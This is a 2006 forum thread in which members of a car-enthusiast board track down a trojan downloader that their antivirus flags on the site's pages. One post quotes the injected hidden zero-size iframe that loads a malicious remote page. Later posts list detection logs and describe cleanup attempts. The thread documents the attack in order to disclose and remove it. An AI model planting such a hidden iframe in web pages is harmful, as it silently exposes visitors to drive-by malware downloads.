Trojans?

[ookami]

I thought it had gone, but alas, I just got another warning from my a/v (Avast pro).

Seems to identify it as WIN32 Trojano ...

My a/v catches it and terminates connection before there's any consequence.

This only happened for the first time on Friday I think.

Has never happened before, so I cant imagine, as previously mentioned by someone, that it's Invision, unless SAU has just changed their system over.

Also, had no old cache, i clean it almost daily, and IE is set to load new page everytime (no caching).

Anyways, not a big deal on my end, but perhaps might be helpful to track down the issue.

We use Avast on our server (Avast Server Edition) at work and yeah just about every trojan they find it labels it as a win32:trojano.

GET FIREFOX or OPERA instead of the IE browser.... ITS not the SAU board, its because the SAU board is Invision and Ie has a big hole in it ... the same will happen on any Invision Board using an Ie browser until Microsoft do something .

I have to stick with IE for compatability reasons and yes it appears to be SAU as other Invision Boards I've been to today, aren't affecting any of my virus scanners. The trojan doesn't appear as often as it was late last week, as I've only seen it twice in the 20 odd times I've either refreshed or been to the board today.

[PranK]

Guys, please report if this happens again as I found the source of the trojan!

<iframe src="http://196.regvista.com/index.php?ref=nu" width="0" height="0" frameborder="0"></iframe>

Bastards!!

[ish]

thats part of it .... its the reference where infomation will be logged

[ish]

ok .. i have found a way to trigger it on cue to dload with IE

Its intermitant depending on how you navigate your Ie browser

I think this is better closed up again (forum) because Patching is not sufficent yet until its understood how it loads and got into the code. people that dont understand things will get all nasty again.

So better closing the hole again so they cant blame...

I am no mod or admin here so i can only reco what i would do gang.

later

back in a few hours ish!

Edited July 4, 2006 by ishh

[Beer Baron]

i am looking at all the manual ways now....

... For a try install norton in Safe mode ... Or systems restoring before hand and repeating...

Looking into this more now I see its a fairly old exploit reworked . So until more info unfolds its a bit hard.

F8 key hold down on reboot until you get Safe mode ... then run the the install. Its tricky because you have to some how get the Av to update in safe mode

My AV rips it straight out !!! Pm me if you would like to try it .

Munkyb0y Av only finds it once its been reported. the exploits can function and go on for months before this!

thanks mate, i will try this stuff tonight when i get home. i'm a bit noob with security, viruses etc.

[ish]

Whoa ...Well Done Prank!!!... its gone i cant even get it to trigger now ...

For those that did get infected and AV crashed, try that link i splashed before. It did clean it surprisingly for free!

[PranK]

Yep, looks all good now!

Thanks ishh!

[ookami]

Whoa ...Well Done Prank!!!... its gone i cant even get it to trigger now ...

For those that did get infected and AV crashed, try that link i splashed before. It did clean it surprisingly for free!

If your anti virus couldn't get rid of it and the trojan got round it, you need to either 1)update your virus scanner a damn lot more or 2)get a decent virus scanner. If some free net thing can get rid of it and a PC based one can't you've got security problems

[CruiseLiner]

hey guys mines still going through that 169vista site or whatever when i bring up sau homepage. and saying trojan infected yada yada

how exactly do i make sure ive deleted all the old internet files/cache and whatever else needs to be done to get rid of it for good?????

its giving me the shits at the moment

[sewid]

I thought it was gone but again i'm getting these trojan alerts in IE.

As to the person who suggested switch to another browser, I cannot install another browser on some of the PC's here due to the corporate policy.

[ish]

Re occur! this is what i was worried about ...

Prank. i mentioned in your PM my bigger fears of how this may be happening.

Until you find whats loading it or re Writting, it will keep coming bac unfortunatly.

Dam i would luv to be a NEt admin at the moment ... i would Argue the Mozilla and be a hero in the work place by doing nothing !

[R31Nismoid]

Its fine for me since prankeh removed that line...

i also cleared all the temp files etc etc

[ish]

no it's not R31Nismoid.... I am sitting here triggering it again like I showed Prank ...

triggered virus several times just then over the last few min's to see .

detected: Trojan program Trojan-Downloader.HTML.Agent.ao Script: http://www.skylinesaustralia.com/forums/in...=124658&hl=[2]

detected: Trojan program Trojan-Downloader.HTML.Agent.ao Script: http://www.skylinesaustralia.com/forums/in...=124503&hl=[2]

detected: Trojan program Trojan-Downloader.HTML.Agent.ao Script: http://www.skylinesaustralia.com/forums/in...s&lastdate=[2]

detected: Trojan program Trojan-Downloader.HTML.Agent.ao Script: http://www.skylinesaustralia.com/forums/in...194entry2306194[2]

detected: Trojan program Trojan-Downloader.HTML.Agent.ao Script: http://www.skylinesaustralia.com/forums/in...24535&st=40[2]

detected: Trojan program Trojan-Downloader.HTML.Agent.ao Script: http://www.skylinesaustralia.com/forums/in...=124803&hl=[2]

It re writes the code which is why i think what i think in Pranks PM. i am not going to Blurt it out here !

Edited July 5, 2006 by ishh

[R32 TT]

no it's not R31Nismoid.... I am sitting here triggering it again like I showed Prank ...

triggered virus several times just then over the last few min's to see .

Yup, I afraid its still in there guys. Got it just now as I clicked to read this thread...

[R31Nismoid]

no it's not R31Nismoid.... I am sitting here triggering it again like I showed Prank ...

Thats nice...

Still doesnt detract from the fact that it is fine for me, which... is what i initially said.

Doesnt mean its right for other people, i never said it was right for anyone else.

Im just giving more feedback on what ive already said

[ish]

ok. then

[Snowman]

Its still around for me too.

[raz0r$harP.UK]

Comes about 50% of the time. I can see IE trying to access something from http://196.regvista.com through the IFRAME and so I just hit stop and reload. Usually on the second or third attempt the page loads without the trojan.

[PranK]

ok, removed it again. I have lodged a ticket with IPB to see whether their patch missed something.

[Nismo_Boy]

Still had a major issue after you guys said it was removed, crashed my computer even after a complete cache refresh, spy wear check and removal as well as a full virus scan.

Virus would not allow to transfer documents, wouldn’t allow to run any programs in hope of finding the problem and removing it again.. Kept getting access denied, you do not have permission when trying to open Anti virus program, spy wear remover ect.

We ended up having to do a full system recover, which has seemed to fix it now. What ever happened, was worse the seconded time around.. An came from this site at some point.

Jus thought I would let you guys know.